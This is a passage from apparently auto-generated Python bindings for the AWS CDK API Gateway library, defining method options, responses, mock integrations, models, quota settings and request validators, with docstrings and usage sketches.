:param request_models: The models that are used for the request's content type. Specify request models as key-value pairs (string-to-string mapping), with a content type as the key and a Model resource name as the value.
:param request_parameters: The request parameters that API Gateway accepts. Specify request parameters as key-value pairs (string-to-Boolean mapping), with a source as the key and a Boolean as the value. The Boolean specifies whether a parameter is required. A source must match the format method.request.location.name, where the location is querystring, path, or header, and name is a valid, unique parameter name. Default: None
:param request_validator: The ID of the associated request validator.
"""
self._values = {
}
if api_key_required is not None: self._values["api_key_required"] = api_key_required
if authorization_type is not None: self._values["authorization_type"] = authorization_type
if authorizer is not None: self._values["authorizer"] = authorizer
if method_responses is not None: self._values["method_responses"] = method_responses
if operation_name is not None: self._values["operation_name"] = operation_name
if request_models is not None: self._values["request_models"] = request_models
if request_parameters is not None: self._values["request_parameters"] = request_parameters
if request_validator is not None: self._values["request_validator"] = request_validator
@property
def api_key_required(self) -> typing.Optional[bool]:
"""Indicates whether the method requires clients to submit a valid API key.
default
:default: false
"""
return self._values.get('api_key_required')
@property
def authorization_type(self) -> typing.Optional["AuthorizationType"]:
"""Method authorization.
default
:default: None (open access)
"""
return self._values.get('authorization_type')
@property
def authorizer(self) -> typing.Optional["IAuthorizer"]:
"""If ``authorizationType`` is ``Custom``, this specifies the ID of the method authorizer resource."""
return self._values.get('authorizer')
@property
def method_responses(self) -> typing.Optional[typing.List["MethodResponse"]]:
"""The responses that can be sent to the client who calls the method.
default
:default:
None
This property is not required, but if these are not supplied for a Lambda
proxy integration, the Lambda function must return a value of the correct format,
for the integration response to be correctly mapped to a response to the client.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-method-settings-method-response.html
"""
return self._values.get('method_responses')
@property
def operation_name(self) -> typing.Optional[str]:
"""A friendly operation name for the method.
For example, you can assign the
OperationName of ListPets for the GET /pets method.
"""
return self._values.get('operation_name')
@property
def request_models(self) -> typing.Optional[typing.Mapping[str,"IModel"]]:
"""The resources that are used for the response's content type.
Specify request
models as key-value pairs (string-to-string mapping), with a content type
as the key and a Model resource name as the value
"""
return self._values.get('request_models')
@property
def request_parameters(self) -> typing.Optional[typing.Mapping[str,bool]]:
"""The request parameters that API Gateway accepts.
Specify request parameters
as key-value pairs (string-to-Boolean mapping), with a source as the key and
a Boolean as the value. The Boolean specifies whether a parameter is required.
A source must match the format method.request.location.name, where the location
is querystring, path, or header, and name is a valid, unique parameter name.
default
:default: None
"""
return self._values.get('request_parameters')
@property
def request_validator(self) -> typing.Optional["IRequestValidator"]:
"""The ID of the associated request validator."""
return self._values.get('request_validator')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'MethodOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
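# Usage sketch (illustrative only). ``MethodOptions`` is normally spread as
# keyword arguments to ``resource.add_method`` or supplied as a resource's
# ``default_method_options``:
#
#   options = MethodOptions(
#       api_key_required=True,
#       authorization_type=AuthorizationType.IAM,
#       operation_name="ListPets")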
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.MethodProps", jsii_struct_bases=[], name_mapping={'http_method': 'httpMethod', 'resource': 'resource', 'integration': 'integration', 'options': 'options'})
class MethodProps():
def __init__(self, *, http_method: str, resource: "IResource", integration: typing.Optional["Integration"]=None, options: typing.Optional["MethodOptions"]=None):
"""
:param http_method: The HTTP method ("GET", "POST", "PUT", ...) that clients use to call this method.
:param resource: The resource this method is associated with. For root resource methods, specify the ``RestApi`` object.
:param integration: The backend system that the method calls when it receives a request. Default: - a new ``MockIntegration``.
:param options: Method options. Default: - No options.
"""
if isinstance(options, dict): options = MethodOptions(**options)
self._values = {
'http_method': http_method,
'resource': resource,
}
if integration is not None: self._values["integration"] = integration
if options is not None: self._values["options"] = options
@property
def http_method(self) -> str:
"""The HTTP method ("GET", "POST", "PUT", ...) that clients use to call this method."""
return self._values.get('http_method')
@property
def resource(self) -> "IResource":
"""The resource this method is associated with.
For root resource methods,
specify the ``RestApi`` object.
"""
return self._values.get('resource')
@property
def integration(self) -> typing.Optional["Integration"]:
"""The backend system that the method calls when it receives a request.
default
:default: - a new ``MockIntegration``.
"""
return self._values.get('integration')
@property
def options(self) -> typing.Optional["MethodOptions"]:
"""Method options.
default
:default: - No options.
"""
return self._values.get('options')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'MethodProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.MethodResponse", jsii_struct_bases=[], name_mapping={'status_code': 'statusCode', 'response_models': 'responseModels', 'response_parameters': 'responseParameters'})
class MethodResponse():
def __init__(self, *, status_code: str, response_models: typing.Optional[typing.Mapping[str,"IModel"]]=None, response_parameters: typing.Optional[typing.Mapping[str,bool]]=None):
"""
:param status_code: The method response's status code, which you map to an IntegrationResponse. Required.
:param response_models: The resources used for the response's content type. Specify response models as key-value pairs (string-to-string maps), with a content type as the key and a Model resource name as the value. Default: None
:param response_parameters: Response parameters that API Gateway sends to the client that called a method. Specify response parameters as key-value pairs (string-to-Boolean maps), with a destination as the key and a Boolean as the value. Specify the destination using the following pattern: method.response.header.name, where the name is a valid, unique header name. The Boolean specifies whether a parameter is required. Default: None
"""
self._values = {
'status_code': status_code,
}
if response_models is not None: self._values["response_models"] = response_models
if response_parameters is not None: self._values["response_parameters"] = response_parameters
@property
def status_code(self) -> str:
"""The method response's status code, which you map to an IntegrationResponse. Required."""
return self._values.get('status_code')
@property
def response_models(self) -> typing.Optional[typing.Mapping[str,"IModel"]]:
"""The resources used for the response's content type.
Specify response models as
key-value pairs (string-to-string maps), with a content type as the key and a Model
resource name as the value.
default
:default: None
"""
return self._values.get('response_models')
@property
def response_parameters(self) -> typing.Optional[typing.Mapping[str,bool]]:
"""Response parameters that API Gateway sends to the client that called a method. Specify response parameters as key-value pairs (string-to-Boolean maps), with a destination as the key and a Boolean as the value. Specify the destination using the following pattern: method.response.header.name, where the name is a valid, unique header name. The Boolean specifies whether a parameter is required.
default
:default: None
"""
return self._values.get('response_parameters')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'MethodResponse(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
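# Usage sketch (illustrative only): declare a 200 response and mark a CORS
# header as mappable from the integration response:
#
#   response = MethodResponse(
#       status_code="200",
#       response_parameters={
#           "method.response.header.Access-Control-Allow-Origin": True})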
class MockIntegration(Integration, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.MockIntegration"):
"""This type of integration lets API Gateway return a response without sending the request further to the backend.
This is useful for API testing because it
can be used to test the integration set up without incurring charges for
using the backend and to enable collaborative development of an API. In
collaborative development, a team can isolate their development effort by
setting up simulations of API components owned by other teams by using the
MOCK integrations. It is also used to return CORS-related headers to ensure
that the API method permits CORS access. In fact, the API Gateway console
integrates the OPTIONS method to support CORS with a mock integration.
Gateway responses are other examples of mock integrations.
"""
def __init__(self, *, cache_key_parameters: typing.Optional[typing.List[str]]=None, cache_namespace: typing.Optional[str]=None, connection_type: typing.Optional["ConnectionType"]=None, content_handling: typing.Optional["ContentHandling"]=None, credentials_passthrough: typing.Optional[bool]=None, credentials_role: typing.Optional[aws_cdk.aws_iam.IRole]=None, integration_responses: typing.Optional[typing.List["IntegrationResponse"]]=None, passthrough_behavior: typing.Optional["PassthroughBehavior"]=None, request_parameters: typing.Optional[typing.Mapping[str,str]]=None, request_templates: typing.Optional[typing.Mapping[str,str]]=None, vpc_link: typing.Optional["VpcLink"]=None) -> None:
"""
:param options: -
:param cache_key_parameters: A list of request parameters whose values are to be cached. It determines request parameters that will make it into the cache key.
:param cache_namespace: An API-specific tag group of related cached parameters.
:param connection_type: The type of network connection to the integration endpoint. Default: ConnectionType.Internet
:param content_handling: Specifies how to handle request payload content type conversions. Default: none if this property isn't defined, the request payload is passed through from the method request to the integration request without modification, provided that the ``passthroughBehaviors`` property is configured to support payload pass-through.
:param credentials_passthrough: Requires that the caller's identity be passed through from the request. Default: Caller identity is not passed through
:param credentials_role: An IAM role that API Gateway assumes. Mutually exclusive with ``credentialsPassThrough``. Default: A role is not assumed
:param integration_responses: The response that API Gateway provides after a method's backend completes processing a request. API Gateway intercepts the response from the backend so that you can control how API Gateway surfaces backend responses. For example, you can map the backend status codes to codes that you define.
:param passthrough_behavior: Specifies the pass-through behavior for incoming requests based on the Content-Type header in the request, and the available mapping templates specified as the requestTemplates property on the Integration resource. There are three valid values: WHEN_NO_MATCH, WHEN_NO_TEMPLATES, and NEVER.
:param request_parameters: The request parameters that API Gateway sends with the backend request. Specify request parameters as key-value pairs (string-to-string mappings), with a destination as the key and a source as the value. Specify the destination by using the following pattern integration.request.location.name, where location is querystring, path, or header, and name is a valid, unique parameter name. The source must be an existing method request parameter or a static value. You must enclose static values in single quotation marks and pre-encode these values based on their destination in the request.
:param request_templates: A map of Apache Velocity templates that are applied on the request payload. The template that API Gateway uses is based on the value of the Content-Type header that's sent by the client. The content type value is the key, and the template is the value (specified as a string), such as the following snippet: { "application/json": "{\n "statusCode": "200"\n}" }
:param vpc_link: The VpcLink used for the integration. Required if connectionType is VPC_LINK.
"""
options = IntegrationOptions(cache_key_parameters=cache_key_parameters, cache_namespace=cache_namespace, connection_type=connection_type, content_handling=content_handling, credentials_passthrough=credentials_passthrough, credentials_role=credentials_role, integration_responses=integration_responses, passthrough_behavior=passthrough_behavior, request_parameters=request_parameters, request_templates=request_templates, vpc_link=vpc_link)
jsii.create(MockIntegration, self, [options])
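# Usage sketch (illustrative; assumes an existing ``resource``): a mock
# endpoint that always answers 200 without calling any backend:
#
#   mock = MockIntegration(
#       integration_responses=[IntegrationResponse(status_code="200")],
#       passthrough_behavior=PassthroughBehavior.NEVER,
#       request_templates={"application/json": '{ "statusCode": 200 }'})
#   resource.add_method("GET", mock,
#       method_responses=[MethodResponse(status_code="200")])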
@jsii.implements(IModel)
class Model(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.Model"):
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, rest_api: "IRestApi", schema: "JsonSchema", content_type: typing.Optional[str]=None, description: typing.Optional[str]=None, model_name: typing.Optional[str]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param rest_api: The rest API that this model is part of. The reason we need the RestApi object itself and not just the ID is because the model is being tracked by the top-level RestApi object for the purpose of calculating its hash to determine the ID of the deployment. This allows us to automatically update the deployment when the model of the REST API changes.
:param schema: The schema to use to transform data to one or more output formats. Specify null ({}) if you don't want to specify a schema.
:param content_type: The content type for the model. You can also force a content type in the request or response model mapping. Default: -
:param description: A description that identifies this model. Default: None
:param model_name: A name for the model. Important: If you specify a name, you cannot perform updates that require replacement of this resource. You can perform updates that require no or some interruption. If you must replace the resource, specify a new name. Default: If you don't specify a name, AWS CloudFormation generates a unique physical ID and uses that ID for the model name. For more information, see Name Type.
"""
props = ModelProps(rest_api=rest_api, schema=schema, content_type=content_type, description=description, model_name=model_name)
jsii.create(Model, self, [scope, id, props])
@jsii.member(jsii_name="fromModelName")
@classmethod
def from_model_name(cls, scope: aws_cdk.core.Construct, id: str, model_name: str) -> "IModel":
"""
:param scope: -
:param id: -
:param model_name: -
"""
return jsii.sinvoke(cls, "fromModelName", [scope, id, model_name])
@classproperty
@jsii.member(jsii_name="EMPTY_MODEL")
def EMPTY_MODEL(cls) -> "IModel":
"""Represents a reference to a REST API's Empty model, which is available as part of the model collection by default.
This can be used for mapping
JSON responses from an integration to what is returned to a client,
where strong typing is not required. In the absence of any defined
model, the Empty model will be used to return the response payload
unmapped.
Definition
{
"$schema" : "http://json-schema.org/draft-04/schema#",
"title" : "Empty Schema",
"type" : "object"
}
see
:see: https://docs.amazonaws.cn/en_us/apigateway/latest/developerguide/models-mappings.html#models-mappings-models
"""
return jsii.sget(cls, "EMPTY_MODEL")
@classproperty
@jsii.member(jsii_name="ERROR_MODEL")
def ERROR_MODEL(cls) -> "IModel":
"""Represents a reference to a REST API's Error model, which is available as part of the model collection by default.
This can be used for mapping
error JSON responses from an integration to a client, where a simple
generic message field is sufficient to map and return an error payload.
Definition
{
"$schema" : "http://json-schema.org/draft-04/schema#",
"title" : "Error Schema",
"type" : "object",
"properties" : {
"message" : { "type" : "string" }
}
}
"""
return jsii.sget(cls, "ERROR_MODEL")
@property
@jsii.member(jsii_name="modelId")
def model_id(self) -> str:
"""Returns the model name, such as 'myModel'.
attribute:
:attribute:: true
"""
return jsii.get(self, "modelId")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ModelOptions", jsii_struct_bases=[], name_mapping={'schema': 'schema', 'content_type': 'contentType', 'description': 'description', 'model_name': 'modelName'})
class ModelOptions():
def __init__(self, *, schema: "JsonSchema", content_type: typing.Optional[str]=None, description: typing.Optional[str]=None, model_name: typing.Optional[str]=None):
"""
:param schema: The schema to use to transform data to one or more output formats. Specify null ({}) if you don't want to specify a schema.
:param content_type: The content type for the model. You can also force a content type in the request or response model mapping. Default: -
:param description: A description that identifies this model. Default: None
:param model_name: A name for the model. Important: If you specify a name, you cannot perform updates that require replacement of this resource. You can perform updates that require no or some interruption. If you must replace the resource, specify a new name. Default: If you don't specify a name, AWS CloudFormation generates a unique physical ID and uses that ID for the model name. For more information, see Name Type.
"""
if isinstance(schema, dict): schema = JsonSchema(**schema)
self._values = {
'schema': schema,
}
if content_type is not None: self._values["content_type"] = content_type
if description is not None: self._values["description"] = description
if model_name is not None: self._values["model_name"] = model_name
@property
def schema(self) -> "JsonSchema":
"""The schema to use to transform data to one or more output formats. Specify null ({}) if you don't want to specify a schema."""
return self._values.get('schema')
@property
def content_type(self) -> typing.Optional[str]:
"""The content type for the model.
You can also force a
content type in the request or response model mapping.
default
:default: -
"""
return self._values.get('content_type')
@property
def description(self) -> typing.Optional[str]:
"""A description that identifies this model.
default
:default: None
"""
return self._values.get('description')
@property
def model_name(self) -> typing.Optional[str]:
"""A name for the model.
Important:
If you specify a name, you cannot perform updates that
require replacement of this resource. You can perform
updates that require no or some interruption. If you
must replace the resource, specify a new name.
default
:default:
If you don't specify a name,
AWS CloudFormation generates a unique physical ID and
uses that ID for the model name. For more information,
see Name Type.
"""
return self._values.get('model_name')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ModelOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ModelProps", jsii_struct_bases=[ModelOptions], name_mapping={'schema': 'schema', 'content_type': 'contentType', 'description': 'description', 'model_name': 'modelName', 'rest_api': 'restApi'})
class ModelProps(ModelOptions):
def __init__(self, *, schema: "JsonSchema", content_type: typing.Optional[str]=None, description: typing.Optional[str]=None, model_name: typing.Optional[str]=None, rest_api: "IRestApi"):
"""
:param schema: The schema to use to transform data to one or more output formats. Specify null ({}) if you don't want to specify a schema.
:param content_type: The content type for the model. You can also force a content type in the request or response model mapping. Default: -
:param description: A description that identifies this model. Default: None
:param model_name: A name for the model. Important: If you specify a name, you cannot perform updates that require replacement of this resource. You can perform updates that require no or some interruption. If you must replace the resource, specify a new name. Default: If you don't specify a name, AWS CloudFormation generates a unique physical ID and uses that ID for the model name. For more information, see Name Type.
:param rest_api: The rest API that this model is part of. The reason we need the RestApi object itself and not just the ID is because the model is being tracked by the top-level RestApi object for the purpose of calculating its hash to determine the ID of the deployment. This allows us to automatically update the deployment when the model of the REST API changes.
"""
if isinstance(schema, dict): schema = JsonSchema(**schema)
self._values = {
'schema': schema,
'rest_api': rest_api,
}
if content_type is not None: self._values["content_type"] = content_type
if description is not None: self._values["description"] = description
if model_name is not None: self._values["model_name"] = model_name
@property
def schema(self) -> "JsonSchema":
"""The schema to use to transform data to one or more output formats. Specify null ({}) if you don't want to specify a schema."""
return self._values.get('schema')
@property
def content_type(self) -> typing.Optional[str]:
"""The content type for the model.
You can also force a
content type in the request or response model mapping.
default
:default: -
"""
return self._values.get('content_type')
@property
def description(self) -> typing.Optional[str]:
"""A description that identifies this model.
default
:default: None
"""
return self._values.get('description')
@property
def model_name(self) -> typing.Optional[str]:
"""A name for the model.
Important:
If you specify a name, you cannot perform updates that
require replacement of this resource. You can perform
updates that require no or some interruption. If you
must replace the resource, specify a new name.
default
:default:
If you don't specify a name,
AWS CloudFormation generates a unique physical ID and
uses that ID for the model name. For more information,
see Name Type.
"""
return self._values.get('model_name')
@property
def rest_api(self) -> "IRestApi":
"""The rest API that this model is part of.
The reason we need the RestApi object itself and not just the ID is because the model
is being tracked by the top-level RestApi object for the purpose of calculating its
hash to determine the ID of the deployment. This allows us to automatically update
the deployment when the model of the REST API changes.
"""
return self._values.get('rest_api')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ModelProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.PassthroughBehavior")
class PassthroughBehavior(enum.Enum):
WHEN_NO_MATCH = "WHEN_NO_MATCH"
"""Passes the request body for unmapped content types through to the integration back end without transformation."""
NEVER = "NEVER"
"""Rejects unmapped content types with an HTTP 415 'Unsupported Media Type' response."""
WHEN_NO_TEMPLATES = "WHEN_NO_TEMPLATES"
"""Allows pass-through when the integration has NO content types mapped to templates.
However if there is at least one content type defined,
unmapped content types will be rejected with the same 415 response.
"""
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.Period")
class Period(enum.Enum):
"""Time period for which quota settings apply."""
DAY = "DAY"
WEEK = "WEEK"
MONTH = "MONTH"
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.QuotaSettings", jsii_struct_bases=[], name_mapping={'limit': 'limit', 'offset': 'offset', 'period': 'period'})
class QuotaSettings():
def __init__(self, *, limit: typing.Optional[jsii.Number]=None, offset: typing.Optional[jsii.Number]=None, period: typing.Optional["Period"]=None):
"""Specifies the maximum number of requests that clients can make to API Gateway APIs.
:param limit: The maximum number of requests that users can make within the specified time period. Default: none
:param offset: For the initial time period, the number of requests to subtract from the specified limit. Default: none
:param period: The time period for which the maximum limit of requests applies. Default: none
"""
self._values = {
}
if limit is not None: self._values["limit"] = limit
if offset is not None: self._values["offset"] = offset
if period is not None: self._values["period"] = period
@property
def limit(self) -> typing.Optional[jsii.Number]:
"""The maximum number of requests that users can make within the specified time period.
default
:default: none
"""
return self._values.get('limit')
@property
def offset(self) -> typing.Optional[jsii.Number]:
"""For the initial time period, the number of requests to subtract from the specified limit.
default
:default: none
"""
return self._values.get('offset')
@property
def period(self) -> typing.Optional["Period"]:
"""The time period for which the maximum limit of requests applies.
default
:default: none
"""
return self._values.get('period')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'QuotaSettings(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
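# Usage sketch (illustrative; assumes an existing ``api`` RestApi). Quota
# settings are usually attached through a usage plan:
#
#   api.add_usage_plan("BasicPlan",
#       name="Basic",
#       quota=QuotaSettings(limit=1000, period=Period.MONTH))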
@jsii.implements(IRequestValidator)
class RequestValidator(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.RequestValidator"):
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, rest_api: "IRestApi", request_validator_name: typing.Optional[str]=None, validate_request_body: typing.Optional[bool]=None, validate_request_parameters: typing.Optional[bool]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param rest_api: The rest API that this request validator is part of. The reason we need the RestApi object itself and not just the ID is because the validator is being tracked by the top-level RestApi object for the purpose of calculating its hash to determine the ID of the deployment. This allows us to automatically update the deployment when the model of the REST API changes.
:param request_validator_name: The name of this request validator. Default: None
:param validate_request_body: Indicates whether to validate the request body according to the configured schema for the targeted API and method. Default: false
:param validate_request_parameters: Indicates whether to validate request parameters. Default: false
"""
props = RequestValidatorProps(rest_api=rest_api, request_validator_name=request_validator_name, validate_request_body=validate_request_body, validate_request_parameters=validate_request_parameters)
jsii.create(RequestValidator, self, [scope, id, props])
@jsii.member(jsii_name="fromRequestValidatorId")
@classmethod
def from_request_validator_id(cls, scope: aws_cdk.core.Construct, id: str, request_validator_id: str) -> "IRequestValidator":
"""
:param scope: -
:param id: -
:param request_validator_id: -
"""
return jsii.sinvoke(cls, "fromRequestValidatorId", [scope, id, request_validator_id])
@property
@jsii.member(jsii_name="requestValidatorId")
def request_validator_id(self) -> str:
"""ID of the request validator, such as abc123.
attribute:
:attribute:: true
"""
return jsii.get(self, "requestValidatorId")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.RequestValidatorOptions", jsii_struct_bases=[], name_mapping={'request_validator_name': 'requestValidatorName', 'validate_request_body': 'validateRequestBody', 'validate_request_parameters': 'validateRequestParameters'})
class RequestValidatorOptions():
def __init__(self, *, request_validator_name: typing.Optional[str]=None, validate_request_body: typing.Optional[bool]=None, validate_request_parameters: typing.Optional[bool]=None):
"""
:param request_validator_name: The name of this request validator. Default: None
:param validate_request_body: Indicates whether to validate the request body according to the configured schema for the targeted API and method. Default: false
:param validate_request_parameters: Indicates whether to validate request parameters. Default: false
"""
self._values = {
}
if request_validator_name is not None: self._values["request_validator_name"] = request_validator_name
if validate_request_body is not None: self._values["validate_request_body"] = validate_request_body
if validate_request_parameters is not None: self._values["validate_request_parameters"] = validate_request_parameters
@property
def request_validator_name(self) -> typing.Optional[str]:
"""The name of this request validator.
default
:default: None
"""
return self._values.get('request_validator_name')
@property
def validate_request_body(self) -> typing.Optional[bool]:
"""Indicates whether to validate the request body according to the configured schema for the targeted API and method.
default
:default: false
"""
return self._values.get('validate_request_body')
@property
def validate_request_parameters(self) -> typing.Optional[bool]:
"""Indicates whether to validate request parameters.
default
:default: false
"""
return self._values.get('validate_request_parameters')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'RequestValidatorOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.RequestValidatorProps", jsii_struct_bases=[RequestValidatorOptions], name_mapping={'request_validator_name': 'requestValidatorName', 'validate_request_body': 'validateRequestBody', 'validate_request_parameters': 'validateRequestParameters', 'rest_api': 'restApi'})
class RequestValidatorProps(RequestValidatorOptions):
def __init__(self, *, request_validator_name: typing.Optional[str]=None, validate_request_body: typing.Optional[bool]=None, validate_request_parameters: typing.Optional[bool]=None, rest_api: "IRestApi"):
"""
:param request_validator_name: The name of this request validator. Default: None
:param validate_request_body: Indicates whether to validate the request body according to the configured schema for the targeted API and method. Default: false
:param validate_request_parameters: Indicates whether to validate request parameters. Default: false
:param rest_api: The rest API that this request validator is part of. The reason we need the RestApi object itself and not just the ID is because the validator is being tracked by the top-level RestApi object for the purpose of calculating its hash to determine the ID of the deployment. This allows us to automatically update the deployment when the model of the REST API changes.
"""
self._values = {
'rest_api': rest_api,
}
if request_validator_name is not None: self._values["request_validator_name"] = request_validator_name
if validate_request_body is not None: self._values["validate_request_body"] = validate_request_body
if validate_request_parameters is not None: self._values["validate_request_parameters"] = validate_request_parameters
@property
def request_validator_name(self) -> typing.Optional[str]:
"""The name of this request validator.
default
:default: None
"""
return self._values.get('request_validator_name')
@property
def validate_request_body(self) -> typing.Optional[bool]:
"""Indicates whether to validate the request body according to the configured schema for the targeted API and method.
default
:default: false
"""
return self._values.get('validate_request_body')
@property
def validate_request_parameters(self) -> typing.Optional[bool]:
"""Indicates whether to validate request parameters.
default
:default: false
"""
return self._values.get('validate_request_parameters')
@property
def rest_api(self) -> "IRestApi":
"""The rest API that this model is part of.
The reason we need the RestApi object itself and not just the ID is because the model
is being tracked by the top-level RestApi object for the purpose of calculating it's
hash to determine the ID of the deployment. This allows us to automatically update
the deployment when the model of the REST API changes.
"""
return self._values.get('rest_api')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'RequestValidatorProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(IResource)
class ResourceBase(aws_cdk.core.Resource, metaclass=jsii.JSIIAbstractClass, jsii_type="@aws-cdk/aws-apigateway.ResourceBase"):
@staticmethod
def __jsii_proxy_class__():
return _ResourceBaseProxy
def __init__(self, scope: aws_cdk.core.Construct, id: str) -> None:
"""
:param scope: -
:param id: -
"""
jsii.create(ResourceBase, self, [scope, id])
@jsii.member(jsii_name="addCorsPreflight")
def add_cors_preflight(self, *, allow_origins: typing.List[str], allow_credentials: typing.Optional[bool]=None, allow_headers: typing.Optional[typing.List[str]]=None, allow_methods: typing.Optional[typing.List[str]]=None, disable_cache: typing.Optional[bool]=None, expose_headers: typing.Optional[typing.List[str]]=None, max_age: typing.Optional[aws_cdk.core.Duration]=None, status_code: typing.Optional[jsii.Number]=None) -> "Method":
"""Adds an OPTIONS method to this resource which responds to Cross-Origin Resource Sharing (CORS) preflight requests.
Cross-Origin Resource Sharing (CORS) is a mechanism that uses additional
HTTP headers to tell browsers to give a web application running at one
origin, access to selected resources from a different origin. A web
application executes a cross-origin HTTP request when it requests a
resource that has a different origin (domain, protocol, or port) from its
own.
:param options: -
:param allow_origins: Specifies the list of origins that are allowed to make requests to this resource. If you wish to allow all origins, specify ``Cors.ALL_ORIGINS`` or ``[ * ]``. Responses will include the ``Access-Control-Allow-Origin`` response header. If ``Cors.ALL_ORIGINS`` is specified, the ``Vary: Origin`` response header will also be included.
:param allow_credentials: The Access-Control-Allow-Credentials response header tells browsers whether to expose the response to frontend JavaScript code when the request's credentials mode (Request.credentials) is "include". When a request's credentials mode (Request.credentials) is "include", browsers will only expose the response to frontend JavaScript code if the Access-Control-Allow-Credentials value is true. Credentials are cookies, authorization headers or TLS client certificates. Default: false
:param allow_headers: The Access-Control-Allow-Headers response header is used in response to a preflight request which includes the Access-Control-Request-Headers to indicate which HTTP headers can be used during the actual request. Default: Cors.DEFAULT_HEADERS
:param allow_methods: The Access-Control-Allow-Methods response header specifies the method or methods allowed when accessing the resource in response to a preflight request. If ``ANY`` is specified, it will be expanded to ``Cors.ALL_METHODS``. Default: Cors.ALL_METHODS
:param disable_cache: Sets Access-Control-Max-Age to -1, which means that caching is disabled. This option cannot be used with ``maxAge``. Default: - cache is enabled
:param expose_headers: The Access-Control-Expose-Headers response header indicates which headers can be exposed as part of the response by listing their names. If you want clients to be able to access other headers, you have to list them using the Access-Control-Expose-Headers header. Default: - only the 6 CORS-safelisted response headers are exposed: Cache-Control, Content-Language, Content-Type, Expires, Last-Modified, Pragma
:param max_age: The Access-Control-Max-Age response header indicates how long the results of a preflight request (that is the information contained in the Access-Control-Allow-Methods and Access-Control-Allow-Headers headers) can be cached. To disable caching altogether use ``disableCache: true``. Default: - browser-specific (see reference)
:param status_code: Specifies the response status code returned from the OPTIONS method. Default: 204
"""
options = CorsOptions(allow_origins=allow_origins, allow_credentials=allow_credentials, allow_headers=allow_headers, allow_methods=allow_methods, disable_cache=disable_cache, expose_headers=expose_headers, max_age=max_age, status_code=status_code)
return jsii.invoke(self, "addCorsPreflight", [options])
@jsii.member(jsii_name="addMethod")
def add_method(self, http_method: str, integration: typing.Optional["Integration"]=None, *, api_key_required: typing.Optional[bool]=None, authorization_type: typing.Optional["AuthorizationType"]=None, authorizer: typing.Optional["IAuthorizer"]=None, method_responses: typing.Optional[typing.List["MethodResponse"]]=None, operation_name: typing.Optional[str]=None, request_models: typing.Optional[typing.Mapping[str,"IModel"]]=None, request_parameters: typing.Optional[typing.Mapping[str,bool]]=None, request_validator: typing.Optional["IRequestValidator"]=None) -> "Method":
"""Defines a new method for this resource.
:param http_method: -
:param integration: -
:param options: -
:param api_key_required: Indicates whether the method requires clients to submit a valid API key. Default: false
:param authorization_type: Method authorization. Default: None (open access)
:param authorizer: If ``authorizationType`` is ``Custom``, this specifies the ID of the method authorizer resource.
:param method_responses: The responses that can be sent to the client who calls the method. Default: None This property is not required, but if these are not supplied for a Lambda proxy integration, the Lambda function must return a value of the correct format, for the integration response to be correctly mapped to a response to the client.
:param operation_name: A friendly operation name for the method. For example, you can assign the OperationName of ListPets for the GET /pets method.
:param request_models: The models that are used for the request's content type. Specify request models as key-value pairs (string-to-string mapping), with a content type as the key and a Model resource name as the value.
:param request_parameters: The request parameters that API Gateway accepts. Specify request parameters as key-value pairs (string-to-Boolean mapping), with a source as the key and a Boolean as the value. The Boolean specifies whether a parameter is required. A source must match the format method.request.location.name, where the location is querystring, path, or header, and name is a valid, unique parameter name. Default: None
:param request_validator: The ID of the associated request validator.
"""
options = MethodOptions(api_key_required=api_key_required, authorization_type=authorization_type, authorizer=authorizer, method_responses=method_responses, operation_name=operation_name, request_models=request_models, request_parameters=request_parameters, request_validator=request_validator)
return jsii.invoke(self, "addMethod", [http_method, integration, options])
@jsii.member(jsii_name="addProxy")
